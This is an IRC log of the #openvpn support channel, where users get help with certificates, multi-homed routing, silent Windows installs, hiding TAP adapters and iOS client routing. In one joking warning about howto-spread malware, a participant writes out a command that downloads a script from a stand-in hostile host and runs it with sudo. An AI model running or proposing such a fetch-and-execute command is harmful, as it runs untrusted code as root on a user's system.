07:42 <@ecrist> also, if the user is already connected, revoking it won't disconnect the active session 07:42 -!- gedO [~quassel@2002:5877:9af0:1000:adeb:bb17:df63:d8d3] has quit [Remote host closed the connection] 07:43 < khem_> ecrist: it is the correct certificate and I try to verify by establishing a new connection to the OpenVPN 07:44 <@ecrist> !logs 07:44 <@vpnHelper> "logs" is (#1) is please pastebin your logfiles from both client and server with verb set to 5 or (#2) In the Windows client(OpenVPN-GUI) right-click the status icon and pick View Log or (#3) In the OS X client(Tunnelblick) right-click it and select Copy log text to clipboard or (#4) if you dont know how to find your logs, see !logfile 07:44 <@ecrist> !verify 07:44 <@ecrist> !factoids search verify 07:44 <@vpnHelper> "certverify" is (#1) verify your certs are signed correctly by running `openssl verify -CAfile ` for client.crt and server.crt or (#2) also make sure you use the same ca.crt on both sides by checking their md5 07:44 <@ecrist> !certverify 07:44 <@vpnHelper> "certverify" is (#1) verify your certs are signed correctly by running `openssl verify -CAfile ` for client.crt and server.crt or (#2) also make sure you use the same ca.crt on both sides by checking their md5 07:46 <+pekster> khem_: It might be worth a HUP to your server too, just in case that crl-verify directive was added or changed since the service was last restarted 07:46 <+pekster> that'll kill all active connections, so careful not to do that if it's a production system with "important" users on 07:46 <@ecrist> let's start with logs 07:47 < khem_> hmm, server1.crt on server and ca.crt have different md5sums to begin with 07:48 <@ecrist> they're different certs 07:48 <@ecrist> you won't be using a CA cert for the server cert 07:48 < khem_> oh 07:48 < khem_> bit confused 07:48 < khem_> :p 07:48 -!- Cpt-Oblivious [Cpt-Oblivi@a202101.upc-a.chello.nl] has quit [Ping timeout: 248 seconds] 07:49 <@dazo> khem_: I haven't had time to 
fix up this draft .... but maybe this can help a bit more to understand PKI and certificates ... https://community.openvpn.net/openvpn/wiki/How_does_PKI_work 07:49 <@vpnHelper> Title: How_does_PKI_work – OpenVPN Community (at community.openvpn.net) 07:50 < khem_> thank you dazo, very helpful 07:55 -!- b1rkh0ff [~b1rkh0ff@46.36.160.201] has joined #openvpn 07:55 < khem_> the certificates match: keys/xxxx.crt: OK 07:56 < khem_> have to turn on some logging then 08:12 -!- Valcorb [~Valcorb@199.229.249.189] has quit [Ping timeout: 240 seconds] 08:14 < khem_> I read something that there might be issues revoking certs when using static key? 08:17 -!- p3rror [~mezgani@2001:0:53aa:64c:14e8:5090:d607:374c] has quit [Ping timeout: 245 seconds] 08:18 < BtbN> hm, seems like my router does not forward the answers back to me :/ 08:19 -!- Azrael808 [~peter@cpc17-walt12-2-0-cust657.13-2.cable.virginmedia.com] has joined #openvpn 08:19 -!- Azrael808 [~peter@cpc17-walt12-2-0-cust657.13-2.cable.virginmedia.com] has quit [Remote host closed the connection] 08:20 <@dazo> khem_: yeah, it's a big issue with revoking certs when using static key .... the big issue is that you can't use certs with a static key 08:28 < khem_> oh, so even though there have been certs defined in my configuration file it might go for the delegated static key first. 08:28 < khem_> I have no clue, I'm troubleshooting an existing system. 08:28 <+pekster> static-key vs X509 modes are mutually-exclusive 08:28 < holmen> I'm running a server with two physical nics and I've got two separate ips from my isp. Now I want to tunnel the connection to/from eth0 via openvpn to an external service running TUN as setup. I've been helped by pekster before but he does not seem to be available at the moment ( or he's tired of my endeavours :) ). My problem is that the openvpn tunnel opens on eth1 which is the default route in the main table. 
I have added routes and rules 08:32 -!- MeanderingCode [~Meanderin@71-213-188-66.albq.qwest.net] has quit [Remote host closed the connection] 08:32 < khem_> I'm talking about tls-auth cert/ta.key 08:32 <+pekster> holmen: PMs have fallen off my console this morning. Best to keep questions on the main channel anyway since I'm not always here. Split-routing aside, you need to use the --local directive to bind openvpn to the IP on the network you wish to connect through 08:33 < holmen> pekster: I've done that, it still doesn't work 08:34 < holmen> it seems that it tunnels through the gateway of the main table not via the openvpn table that I've created 08:34 <+pekster> holmen: http://lartc.org/howto/lartc.rpdb.multiple-links.html 08:34 <@vpnHelper> Title: Routing for multiple uplinks/providers (at lartc.org) 08:34 <+pekster> You need to fix your policy routing first 08:35 -!- niervol [~krystian@193.106.244.150] has quit [Ping timeout: 248 seconds] 08:36 -!- MeanderingCode [~Meanderin@71-213-188-66.albq.qwest.net] has joined #openvpn 08:37 -!- p3rror [~mezgani@2001:0:53aa:64c:10bc:5090:d607:3e63] has joined #openvpn 08:37 < holmen> thank you! 08:41 -!- jthunder [~jthunder@174.3.126.51] has joined #openvpn 08:42 -!- p3rror [~mezgani@2001:0:53aa:64c:10bc:5090:d607:3e63] has quit [Ping timeout: 245 seconds] 08:49 <@dazo> Hmmm ..... http://i.imgur.com/h2JClux.jpg 08:49 < rob0> haha 08:50 < AsadH> lol dazo 08:50 <+pekster> I dunno, after reiserfs blew up on me my last kernel upgrade, I think the declining use of reiserfs (v3 or v4) results in fewer murders... 08:59 -!- p3rror [~mezgani@2001:0:53aa:64c:1422:5090:d605:12ca] has joined #openvpn 08:59 -!- kyrix [~ashley@85-126-76-82.work.xdsl-line.inode.at] has quit [Ping timeout: 248 seconds] 09:04 -!- p3rror [~mezgani@2001:0:53aa:64c:1422:5090:d605:12ca] has quit [Ping timeout: 245 seconds] 09:06 -!- jthunder [~jthunder@174.3.126.51] has quit [Quit: jthunder] 09:09 < bisko> Hello! 
Anyone here tried running the iOS openvpn client with pkcs12 certificates? The help (docs) on that states that it should work, but alas, it doesn't recognize the pkcs12 certificate and says invalid format. Did anyone manage to get it working ? 09:13 < dioz> i think my lvm2 is broken 09:20 -!- gedO [~quassel@2002:5877:9af0:1000:adeb:bb17:df63:d8d3] has joined #openvpn 09:29 -!- gedO [~quassel@2002:5877:9af0:1000:adeb:bb17:df63:d8d3] has quit [Ping timeout: 252 seconds] 09:40 -!- kyrix [~ashley@chello084112114196.33.11.vie.surfer.at] has joined #openvpn 09:41 -!- kyrix [~ashley@chello084112114196.33.11.vie.surfer.at] has quit [Read error: Connection reset by peer] 09:43 -!- nutcase [~nutcase@unaffiliated/nutcase] has quit [Ping timeout: 248 seconds] 09:46 -!- mbrit [~mbrit@186.120.97.194] has joined #openvpn 09:48 -!- gffa [~unknown@unaffiliated/gffa] has joined #openvpn 09:51 -!- nutcase [~nutcase@unaffiliated/nutcase] has joined #openvpn 09:56 -!- ade_b [~Ade@redhat/adeb] has quit [Ping timeout: 246 seconds] 10:17 -!- bauruine [~stefan@91.236.116.112] has quit [Ping timeout: 256 seconds] 10:25 -!- MeanderingCode [~Meanderin@71-213-188-66.albq.qwest.net] has quit [Read error: Connection reset by peer] 10:27 -!- wh1p [~wh1pl4sh@host-2-100-148-6.as13285.net] has quit [Ping timeout: 245 seconds] 10:33 -!- KaiForce [~chatzilla@adsl-70-228-76-146.dsl.akrnoh.ameritech.net] has joined #openvpn 10:36 -!- mementomori [~mementomo@unaffiliated/mementomori] has quit [Quit: Sto andando via] 10:40 -!- kobolduk [~kobolduk@office.prolocation.net] has quit [Quit: ["Textual IRC Client: www.textualapp.com"]] 10:40 -!- Steven_ [~deepstar@pegasus.singularity.be] has joined #openvpn 10:41 < Steven_> hello everyone 10:42 -!- wh1p [~wh1pl4sh@host-2-100-148-6.as13285.net] has joined #openvpn 10:42 < Steven_> is there a way to install openvpn on windows without user interaction (or as little as possible)? 
10:42 < Steven_> I can't find any documentation on installer commandline flags 10:43 <+pekster> Steven_: It's NSIS, so /S should do a silent install, although you end up with the issue of unsigned drivers asking for permission to install depending on your Local Security policy settings (default is ask about non-WHQL drivers) 10:43 < Steven_> pekster: aha! 10:43 < Steven_> thank you, I'll give it a try 10:46 <@ecrist> iirc, the drivers are all signed now 10:46 < Steven_> windows xp complains though 10:47 -!- raidz_away is now known as raidz 10:48 <+pekster> Yea, my test VM is XP, and it'll ask every time even if I'm reinstalling the same version 10:50 < Steven_> it seems you can disable this behavior when doing unattended installs 10:50 < Steven_> http://unattended.msfn.org/unattended.xp/view/web/34/ 10:50 <@vpnHelper> Title: MSFN's Unattended Windows : Drivers via WINNT.SIF (at unattended.msfn.org) 10:50 < Steven_> looks perfect for my case 10:51 -!- mikkel [~mikkel@80-71-132-15.u.parknet.dk] has joined #openvpn 10:57 -!- bisko [~bisko@77.70.26.115] has quit [Ping timeout: 240 seconds] 11:09 -!- ade_b [~Ade@kista.guest.accome.com] has joined #openvpn 11:09 -!- ade_b [~Ade@kista.guest.accome.com] has quit [Changing host] 11:09 -!- ade_b [~Ade@redhat/adeb] has joined #openvpn 11:22 -!- afuentes [~afuentes@213.37.131.197.static.user.ono.com] has quit [Ping timeout: 240 seconds] 11:32 -!- dioz [~dioz@2001:470:d:e3::1] has quit [Ping timeout: 245 seconds] 11:37 -!- dioz [~dioz@2001:470:d:e3::1] has joined #openvpn 11:57 -!- valparaiso [~valparais@ARennes-257-1-57-80.w81-53.abo.wanadoo.fr] has joined #openvpn 11:58 -!- AsadH is now known as zz_AsadH 12:12 -!- pyro254750 [~jmiller@c-24-99-228-251.hsd1.ga.comcast.net] has joined #openvpn 12:21 < BtbN> IPv6 forwarding is horrible. It behaves very strangely, if you enable it, you automatically disable ra, so you lose your IP address... 
12:24 -!- tyteen4a03 [T4@n218250228096.netvigator.com] has quit [Read error: Connection reset by peer] 12:24 -!- tMobile4a03 [T4@n218250228096.netvigator.com] has joined #openvpn 12:33 -!- Mcloven [~Mcloven@ppp203-122-218-215.static.internode.on.net] has quit [Read error: Connection reset by peer] 12:34 -!- Mcloven [~Mcloven@ppp203-122-218-215.static.internode.on.net] has joined #openvpn 12:50 -!- Orbi [~opera@anon-184-12.vpn.ipredator.se] has joined #openvpn 12:55 < Orbi> @pekster even with SIGUSR1, OpenVPN is not restarting after pppoe connection reset. Here's the log: http://www.pastebay.com/1177174 13:00 <+pekster> Orbi: Interesting. And if you shut it down completely and re-launch it, it works right away? 13:03 < Orbi> no not right away, it seems to need a "cooling off" period 13:03 < Orbi> like 30 seconds 13:07 <+pekster> That's really strange. I'm not sure if --nobind would help since I think it's already releasing the socket completely before a reconnect 13:10 < Orbi> I already have nobind in my config 13:13 < Orbi> maybe with --ping-restart? 13:13 -!- zz_AsadH is now known as AsadH 13:15 <+pekster> No clue really 13:15 < Orbi> It's strange, OpenVPN connects with the remote host, and not even a second after it displays an inactivity timeout and closes the socket 13:15 <+pekster> It's a minute later 13:15 < Orbi> right 13:16 <+pekster> Presumably matching your --ping-restart value 13:16 < Orbi> default is 120 seconds 13:16 < Orbi> so it's gotta be something else 13:17 <+pekster> There has to be something else going on with your pppoe device, because OpenVPN will come back after you do all sorts of dreadful things to the interface. 
I've unplugged cables before, removed USB network adapters it was using, and even had my phone die on me when my router was using NDIS for an uplink, and OpenVPN happily reconnects as soon as it has a routable interface to get to the peer 13:18 < Orbi> Well, it's my crappy isp modem 13:19 < Orbi> Is there any useful info from the log when I killall OpenVPN? http://www.pastebay.com/1177175 13:22 <+pekster> Looks like you're downgrading privileges; are you using the relevant --persist-* options? 13:23 <+pekster> Actually, a client-side config might be helpful to look at too 13:23 < Orbi> you're correct about downgrading privileges, but I'm using persist-key & tun 13:24 <+pekster> Let's see if there's anything that might have been overlooked given that your uplink gets destroyed frequently 13:25 <+pekster> Yea, so the persist options should be fine, provided the client doesn't somehow get a new IP or anything that would require ifconfig to run again. You're not even getting to the TLS handshake though... 13:25 < Orbi> Here's my config: http://www.pastebay.com/1177176 13:25 < holmen> pekster: I've fixed my routing now. But I am connectable from the internet to both nics. Shouldn't the tunneled nic be "unpingable"? 13:26 <+pekster> holmen: Nope, not unless you firewall it 13:26 <+pekster> The fact that you can ping and be pinged from that interface suggests your policy routing is now correct 13:28 < holmen> Hmm ok but the other end of this configuration is an anonymizer service. It does not make sense in my opinion :/ 13:28 < BtbN> so I had to completely switch off every single bit of auto configuration on that machine 13:28 < BtbN> but now it works fine 13:29 < Orbi> @pekster Well after every pppoe connection reset, I get a new IP. But float is set server-side, so it should play nice. 13:29 <+pekster> Orbi: I'm wondering if there's some issue accessing the ca.crt, since I don't think that's controlled by any persist option. 
Is that absolute path available from your chroot? 13:30 <+pekster> ie: /tmp/openvpnc1/jail/tmp/openvpnc1/ca.crt ? 13:30 <+pekster> I don't know if it's trying to access that, or something else it expects 13:30 <+pekster> That's really my only thought at this point 13:30 <+pekster> That or the auth-user-pass. I dunno 13:31 <+pekster> Oh, do you know when openvpn normally re-keys? 13:31 <+pekster> If you get messages like 'killed expiring key' then those would be working anyway 13:31 < Orbi> every hour 13:32 <+pekster> Yea, k, so much for that theory 13:32 < Orbi> Yeah well thanks for thinking along :) 13:32 <+pekster> I'm now out of ideas. You could try not using chroot and user/group options just to see if anything changes, but that's a shot in the dark at this point. If it were I'd also expect error messages to that end with 'verb 4' like you have 13:33 < holmen> pekster: can I see the tunnel in action in some way? 13:33 <+pekster> You connect: it becomes in action 13:34 <+pekster> If you're online, packets can arrive to you. If you want to stop them, firewall them. Networking 101. 13:34 < Orbi> @pekster this issue was already present before using chroot and downgrading privileges 13:35 < holmen> yeah but the whole idea with the tunnel to the external service is to make my ip anonymous. When just starting the tunnel on with standard 13:35 < Orbi> Thanks for the help 13:35 < holmen> ... with standard routing my main ip is hidden. Why isn't it so when routing over the other nic? 13:36 <+pekster> Then bind to the VPN IP and you're done. You can't "not have" an IP/routing configured on an interface you're running a VPN over 13:36 <+pekster> It's like asking for an armored car to secure you without needing the car to drive anyway 13:37 < holmen> ok thank you! You have been really helpful :) 13:37 <+pekster> You need to be able to route to your peer. 
You can then set up a VPN and send traffic across the VPN by using that IP as the bind address (aka: source address) to your apps 13:37 <+pekster> If you don't want certain types of traffic (eg: non VPN traffic) going over the raw link, then you must write firewall rules to prevent it 13:39 < holmen> Ok, that'll be step two. Thank you! 13:41 -!- gedO [~quassel@213.226.181.200] has joined #openvpn 13:41 < gedO> Hey guys, how can I add tap0901 devices to XP windows and make them hidden? 13:41 < gedO> I need a solution that works on XP and on Win8 13:42 < Steven_> gedO: what do you mean by hidden? 13:42 < gedO> When a tap0901 device is added it appears in the bar next to the clock 13:42 < Steven_> I've successfully automated the unattended installation of openvpn on windows xp 13:42 < Steven_> it's pretty nice 13:42 < Steven_> oh 13:42 < gedO> and it is annoying 13:42 < Steven_> I guess that's just a registry setting 13:43 < gedO> Steven_: do you know that setting? 13:43 < Steven_> no 13:43 < Steven_> on windows xp, I don't have an extra icon next to the clock 13:44 < gedO> Steven_: really? 13:44 < Steven_> but I also didn't install tap0901, I used the default tap driver that came with the openvpn installer 13:44 < gedO> Steven_: Please, tell more about that default driver 13:44 -!- brute11k1 [~brute11k@89.249.230.101] has quit [Quit: Leaving.] 13:45 < gedO> Steven_: Where can I find it? 13:45 <+pekster> gedO: Pretty sure I told you that hours ago. 
It's in the installer package that you can break open with 7-zip at the relative path .\$TEMP\tap-windows.exe 13:45 < Steven_> in the installer, when it shows the list of components to install, there is a "TAP Virtual Ethernet Adapter" 13:46 <+pekster> You should never use an older tap driver with a more modern version of the product since the 2 parts are closely related to each other 13:46 < Steven_> it's checked by default too 13:46 < gedO> pekster: I have looked at TAP-Windows drivers which are installed with openvpn 13:46 < gedO> Okey guys, I'm gonna extract that installer :) 13:47 -!- _quadDam1ge is now known as _quadDamage 13:47 < Steven_> why are you extracting it? (just curious) 13:47 < gedO> Steven_: I have in mind downloading the source :) 13:47 -!- krzee [nobody@openvpn/community/support/krzee] has joined #openvpn 13:47 -!- mode/#openvpn [+o krzee] by ChanServ 13:49 <+pekster> There's some registry value you can bitmask out to "hide" the adapter I think, although it shouldn't show up in the clock area by default with any modern version of the driver 13:49 <@krzee> !wintaphide 13:49 <@vpnHelper> "wintaphide" is (#1) in regedit find HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E972-E325-11CE-BFC1-08002bE10318} then Look through each sub-key for one with a DriverDesc = TAP-Win32Adapter V8 . Set Characteristics = 0x89 or (#2) To show again, set it to 0x81 13:49 <+pekster> Apparently the secret mask value is 0x08 13:50 < rob0> Wintafide? 13:51 <@krzee> I'm winterfied out here in usa right now 13:51 <@krzee> it's collllllld 13:51 <+pekster> http://answers.microsoft.com/en-us/windows/forum/windows_xp-hardware/ethernet-and-wireless-nics-inoperative-can-not-be/fddb96a7-ec7a-453c-8566-41bf0738287e 13:51 <@vpnHelper> Title: Ethernet and Wireless NICs inoperative can not be - Microsoft Community (at answers.microsoft.com) 13:51 <+pekster> Ugh 13:51 < gedO> pekster: what is the secret mask value? 
13:51 <+pekster> Why does that OS have such stupid ways of doing and then (failing to) explain things? 13:52 <+pekster> gedO: Not only did I give you the XOR bitmask value, but I linked you to an article talking about it in great (great) detail 13:52 < rob0> It warmed up today in Dixieland, CSA! 13:52 <+pekster> Oh, and krzee linked the bot's reply with that same info 13:52 < gedO> pekster: Yes, I have that. But a strange thing appeared 13:52 <@krzee> 5 legged dog? 13:53 < gedO> pekster: I can't add tap devices any more and I don't see any log at windows 8 13:54 < gedO> pekster: I have added 5 and then after some time I want to add more 13:54 < gedO> and I get an error 13:55 <+pekster> You need more than 5 adapters? 13:56 <+pekster> Normally you don't get logs when running addtap.bat. Just run the 'deltapall.bat' script and start over if you have that much of a mess 13:57 < gedO> pekster: okey, thank you 13:57 < BtbN> omg, if someone ever runs into this: the boolean net.ipv6.conf.eth0.accept_ra has 3 possible values. 0 disables ra, 1 enables it if not in forwarding mode, 2 force-enables it... 13:57 <+pekster> Do you really need 5+ tap devices? That sounds a lot like a misconfiguration to me 13:57 < holmen> pekster: just getting back to you. It works like a charm. Thank you for all your help and I'm sorry if I have been a pain in the ass :S 13:57 < holmen> *:D 13:59 <+pekster> holmen: Just no more PMs that fall off the right-edge of my monitor. You do okay when you take the time to read the guides I link (sounds like the lartc guide got your multi-homing fixed, for instance) 13:59 <+pekster> If any of us take time to link it, it's probably worth reading (or we're one too many beers in. But usually the former) 14:03 < holmen> exit 14:03 -!- holmen [~holmen@h-30-250.a176.priv.bahnhof.se] has quit [Quit: leaving] 14:04 <+pekster> krzee: That virus sounds kinda nasty when it abused those flags like 'cannot remove device' in the registry. 
I'm sure glad Linux has no secret sysfs node that breaks modprobe -r for instance :\ 14:06 <@krzee> virus? 14:06 * krzee sneezes 14:07 <+pekster> That microsoft forum link I posted noted some virus that xor'd in 0x28 to that registry value which makes it hidden and non-removable (that's the 0x20 bit) 14:07 <+pekster> Why on earth would you want a bit in a registry that marks a device as "non-removable"? It's so silly it's asking for a virus to flip it... 14:08 <+pekster> Erm, s/xor/or/. Time for more coffee 14:09 <@krzee> hahah nice 14:09 <@krzee> kinda like the lil dir that autoexecuted scripts that nobody knew about until that one gov virus used it 14:10 <@krzee> that one that used like 8 0days together, can't remember the name but it was the gov one before flame that shared code with flame 14:10 <+pekster> I give it less than 5 years before Linux "viruses" are distributed via howtos and bad influences that tell you to do 'wget http://ev.il/bad.sh && sudo sh ./bad.sh' 14:11 <@dazo> krzee: you probably missed this one ... http://i.imgur.com/h2JClux.jpg 14:11 <@dazo> (at least in this channel :-P) 14:12 <@krzee> hahahah 14:12 <@krzee> the murder rate has really been going down? 14:13 <@dazo> I dunno .... 
14:13 <@dazo> I hope it has :-P
14:19 -!- dazo is now known as dazo_afk
14:23 -!- bauruine [~stefan@91.236.116.112] has joined #openvpn
14:26 -!- zrzerenato [~zrzerenat@189-015-223-053.xd-dynamic.ctbcnetsuper.com.br] has quit []
14:33 -!- gedO [~quassel@213.226.181.200] has quit [Remote host closed the connection]
14:43 -!- bisko [~bisko@78-83-118-1.spectrumnet.bg] has joined #openvpn
14:45 -!- Porkepix [~Porkepix@ppp-seco11pa2-46-193-136.233.wb.wifirst.net] has quit [Ping timeout: 256 seconds]
14:46 -!- jackbrown [~se@93-44-76-167.ip96.fastwebnet.it] has quit [Quit: Sto andando via]
14:50 -!- Porkepix [~Porkepix@ppp-seco11pa2-46-193-136.233.wb.wifirst.net] has joined #openvpn
15:11 -!- Orbi [~opera@anon-184-12.vpn.ipredator.se] has quit [Quit: Orbi]
15:23 -!- Cubox [cubox@unaffiliated/cubox] has joined #openvpn
15:23 < Cubox> !ipv6
15:23 <@vpnHelper> "ipv6" is (#1) http://www.greenie.net/ipv6/openvpn.html for info about the ipv6 patch (adds nice ipv6 options to openvpn) or (#2) use 2.3 or see !snapshots for a release with ipv6 patches in it or (#3) http://ipstats.arvig.net/BraveHeartMEME.jpg
15:25 < rob0> oh, that factoid is starting to smell bad.
15:26 < Cubox> why ?
15:26 < Cubox> I need to find a cool ipv6 tutorial, because I'm a little lost...
15:26 < Cubox> for openvpn
15:27 -!- s7r [~s7r@openvpn/user/s7r] has joined #openvpn
15:27 -!- mode/#openvpn [+v s7r] by ChanServ
15:36 < rob0> Did you see the /topic yet? Look for "Current Release".
15:39 -!- roentgen [~arthur@openvpn/community/support/roentgen] has joined #openvpn
15:39 < Cubox> 2.3.0
15:39 < Cubox> so, full ipv6 support.
15:40 < rob0> no patch needed
15:40 <@krzee> hey 2.3.0 came out!
15:40 <@krzee> badass
15:40 < Cubox> I know !
15:40 < Cubox> But, I still need configuration, right ?
15:41 <@krzee> yes
15:41 < Cubox> Or, if you tell me that openvpn guesses everything, I will not believe you.
15:41 < Cubox> krzee: so, where is the conf? :/
15:41 <@krzee> forget about ipv6 and get a normal vpn up
15:41 <@krzee> then make the small mods needed for ipv6
15:41 < Cubox> I have a normal vpn up
15:42 < roentgen> Hi, I'm having some trouble with the ios client
15:42 <@krzee> then how can you say "where is the conf" ?
15:42 <@krzee> ios client got released too!?!?
15:42 <@krzee> holy shit how long have i been gone
15:42 < Cubox> krzee: I mean, is there a HOWTO for ipv6?
15:42 < roentgen> krzee: hmm.. yeah. some days ago
15:43 < roentgen> I can't ping the vpn server from the ipad even though the same config works on the android client
15:43 < roentgen> actually I can ping the vpn server only if I push redirect-gateway def1
15:43 -!- ade_b [~Ade@redhat/adeb] has quit [Ping timeout: 276 seconds]
15:44 <@krzee> can you see logs?
15:44 < roentgen> krzee: yes
15:45 <@krzee> post it
15:45 < roentgen> Cubox: tun-ipv6 in the server config
15:45 < Cubox> roentgen: thanks
15:46 < roentgen> Cubox: and "server-ipv6 an-ipv6-address"
15:46 <@krzee> the options are at:
15:46 <@krzee> !ipv6
15:46 <@vpnHelper> "ipv6" is (#1) http://www.greenie.net/ipv6/openvpn.html for info about the ipv6 patch (adds nice ipv6 options to openvpn) or (#2) use 2.3 or see !snapshots for a release with ipv6 patches in it or (#3) http://ipstats.arvig.net/BraveHeartMEME.jpg
15:46 <@krzee> first link
15:46 < Cubox> oh, thanks :)
15:46 <@krzee> may be updated a little, see manual for more up to date details
15:47 < roentgen> krzee: If I tell you that I have no idea how to copy stuff off an ipad? ;)
15:47 <@krzee> maybe theres a pastebin app or something
15:51 < roentgen> krzee: http://paste.kde.org/655052/
15:52 < roentgen> now back to work to send a config with verb 5 to the ipad... tricky stuff
15:52 <@krzee> i just got my itouch out
15:52 <@krzee> hopefully my beta install is the same
15:54 <@krzee> wow, no logs from gui
15:55 < roentgen> krzee: on the ithing?
15:55 <@krzee> ya
15:55 <@krzee> crazy
15:55 < roentgen> click "status connected"
15:55 <@krzee> it needs to have some easy way for you to get me logs
15:56 <@krzee> so you cant ping 10.8.0.1?
15:56 < roentgen> nope... only with redirect-gateway def1
15:57 < roentgen> which would be fine if safari wouldn't complain that it is not connected to the internet
15:57 < roentgen> and would go open 10.8.0.1 as http
15:58 -!- KaiForce [~chatzilla@adsl-70-228-76-146.dsl.akrnoh.ameritech.net] has quit [Quit: ChatZilla 0.9.89 [Firefox 18.0.1/20130116073211]]
15:59 < roentgen> hmmm.... verb 5 is the same as verb 3 it seems
15:59 -!- mikkel [~mikkel@80-71-132-15.u.parknet.dk] has quit [Quit: Leaving]
15:59 <@krzee> try just pushing a route to 10.8.0.0 255.255.255.0 from server
16:01 < rob0> nono. YOU push. I'll steer.
16:01 < roentgen> I think I did that with push 10.8.0.0/19 10.8.0.1 in a ccd
16:02 <@krzee> hey i cant ping either!
16:02 <@krzee> lemme fix mine then ill tell you wassup ;)
16:02 < roentgen> hah... I'm so glad now ;)
16:04 < roentgen> krzee: you might wanna talk to James Yonan for the 1.0.1 beta version
16:05 <@krzee> oh yes i can, its just 1-way
16:05 <@krzee> seems ios has some sort of firewall or something
16:05 <@krzee> server pings its vpn ip just fine
16:05 <@krzee> check if you have the same results
16:06 < roentgen> I can ping the client from the server yes, if that's what you mean
16:06 <@krzee> then its fine
16:07 <@krzee> i just accessed a website on an ip in the lan behind my server
16:07 <@krzee> from my itouch
16:09 <@krzee> so now we know your ping works
16:09 <@krzee> the webserver you are trying to reach, is it listening on 10.8.0.1?
16:09 -!- defsdoor [~andy@cpc17-sutt4-2-0-cust175.perr.cable.virginmedia.com] has joined #openvpn
16:18 < roentgen> krzee: sorry I was afk
16:19 < roentgen> yes apache is listening on 10.8.0.1
16:19 <@krzee> np
16:20 <@krzee> pastebin netstat -rn from the ipad
16:20 < roentgen> you know of a good terminal app?
16:20 <@krzee> nope
16:20 < roentgen> I searched a whole day for one
16:20 <@krzee> i dont actually use my itouch
16:20 <@krzee> i just happen to have one, lol
16:21 < roentgen> and I could only find a ping/traceroute app
16:21 <@krzee> only has charge so i could listen to music if my other mp3 players die while traveling
16:21 <@krzee> has openvpn cause why the hell not!
16:21 < roentgen> so how do you do a netstat on it?
16:21 <@krzee> dont remember where i found netstat, but its there in cydia
16:22 -!- gffa [~unknown@unaffiliated/gffa] has quit [Quit: sleep]
16:22 <@krzee> adv-cmds
16:22 <@krzee> core utilities
16:22 <@krzee> core utilities (/bin)
16:22 -!- Cubox [cubox@unaffiliated/cubox] has left #openvpn ["WeeChat 0.4.0"]
16:22 <@krzee> debian utilities
16:23 <@krzee> inetutils
16:23 <@krzee> network-cmds
16:23 <@krzee> i think its in that one ^
16:24 < roentgen> hmm... I just remembered that traceroute 10.8.0.1 went thru the local gateway
16:24 < roentgen> so I have a bigger problem than netstat
16:24 <@krzee> get netstat
16:24 <@krzee> its how i see your routes lol
16:27 < roentgen> krzee: hmm... cydia is for jailbroken devices
16:27 < roentgen> and mine is not
16:28 <@krzee> oh right
16:28 < roentgen> I don't even own it
16:28 <@krzee> well figure out how to find your routing table
16:28 <@krzee> thats all im looking for
16:28 <@krzee> maybe try adding the route directly in your config file instead of pushing
16:29 <@krzee> maybe theres an issue with the routes being pushed, not sure why that sounds familiar
16:29 <@krzee> oh nope
16:29 <@krzee> my routes are being pushed
16:30 < roentgen> mine are also pushed as far as openvpn thinks
16:30 < roentgen> it's just that they seem to work
16:30 -!- mdw [~mdw@cpc8-dals18-2-0-cust303.hari.cable.virginmedia.com] has quit [Read error: Operation timed out]
16:31 < roentgen> * not work ;)
16:31 -!- mdw [~mdw@81.171.97.152] has joined #openvpn
16:32 <@krzee> works here, i wish you had netstat
16:33 < roentgen> hmm... I wish there was a blank terminal in this thing
16:33 -!- emmanuelux [~emmanuelu@vau92-2-82-228-217-1.fbx.proxad.net] has joined #openvpn
16:34 < roentgen> I guess I'll post a question on the mailing list... maybe they figure out something
16:35 <@krzee> https://discussions.apple.com/thread/3624745?start=0&tstart=0
16:35 <@vpnHelper> Title: routing table in iphone: Apple Support Communities (at discussions.apple.com)
16:35 <@krzee> there seem to be apps that can show you the routing table
16:42 < roentgen> as a guy in that thread put it: We're not gonna do any of that stuff, but we'll think about it.
16:43 <@krzee> "A more general App would be "iFinder" which gives you more info about the Networking."
16:44 <@krzee> There is a Free app for unjailbroken iPhone, I use, called "What is my MAC Address" not sure who makes it, but it was a free app last I saw, actually it's just called "MAC Address" by Bliss software.
16:44 <@krzee> maybe one of those has it
16:44 <@krzee> i cant see cause i dont have an apple login lol
16:44 <@krzee> well i have one but i dont use it
16:45 < roentgen> ifinder just shows yourself on the map and I got so angry I didn't search for the other one
16:45 <@krzee> lol
16:45 -!- defsdoor [~andy@cpc17-sutt4-2-0-cust175.perr.cable.virginmedia.com] has quit [Quit: Ex-Chat]
16:46 <@krzee> Someone squawked that it was a useless app, and you can get the info from Settings>General>About, but you CAN'T. Also, the app allows you to copy the info and email it to yourself or whatever you want.
16:46 -!- MaxeyPad [~MaxeyPad@74-131-67-45.dhcp.insightbb.com] has quit [Ping timeout: 276 seconds]
16:47 < roentgen> mac address shows only the mac and the ips
16:47 -!- MaxeyPad [~MaxeyPad@74-131-67-45.dhcp.insightbb.com] has joined #openvpn
16:47 <@krzee> the app "system status" from technet costs $?
16:50 < roentgen> 1.79e but it's not my money ;)
16:50 -!- mdw [~mdw@81.171.97.152] has quit [Ping timeout: 276 seconds]
16:53 < roentgen> krzee: this is what I got with the said app http://paste.kde.org/655100/
16:54 -!- bisko [~bisko@78-83-118-1.spectrumnet.bg] has quit [Quit: Computer has gone to sleep.]
16:54 <@krzee> whats 10.8.31.37
16:55 < roentgen> my client vpn ip
16:55 < roentgen> 10.8.0.1 is the server with a /19 netmask
16:56 <@krzee> whats your openvpn config line for that?
16:56 <@krzee> for the pushed route
16:56 < roentgen> normally I don't push routes
16:56 < roentgen> I just use server 10.8.0.0 255.255.224.0
16:56 < roentgen> in the server config
16:56 <@krzee> why so big?
16:57 < roentgen> many clients.... ~1000 currently
16:57 <@krzee> ~1000 on 1 box?
16:57 < roentgen> on a busy day yes
16:57 <@krzee> …and its alive?
16:58 < roentgen> has no problems other than the connection being saturated by the udp traffic
16:58 <@krzee> wtf is your hw!?
16:58 <@krzee> ive heard of openvpn pegging its core at ~250 clients
16:58 < roentgen> it's not hardware intensive as far as I see
16:59 <@krzee> no its not
16:59 <@krzee> but its single threaded and eventually just hits a limit
16:59 <@krzee> the openvpn process itself
16:59 < roentgen> 200 MB of ram and 10% cpu
16:59 <@krzee> whats the hardware?
16:59 <@krzee> blade?
16:59 <@krzee> lol
17:00 < roentgen> AMD Phenom(tm) 8650 Triple-Core Processor
17:00 <@krzee> how many mhz per core?
17:00 <@krzee> cause openvpn is only on 1 of them
17:00 <@krzee> ghz, sry
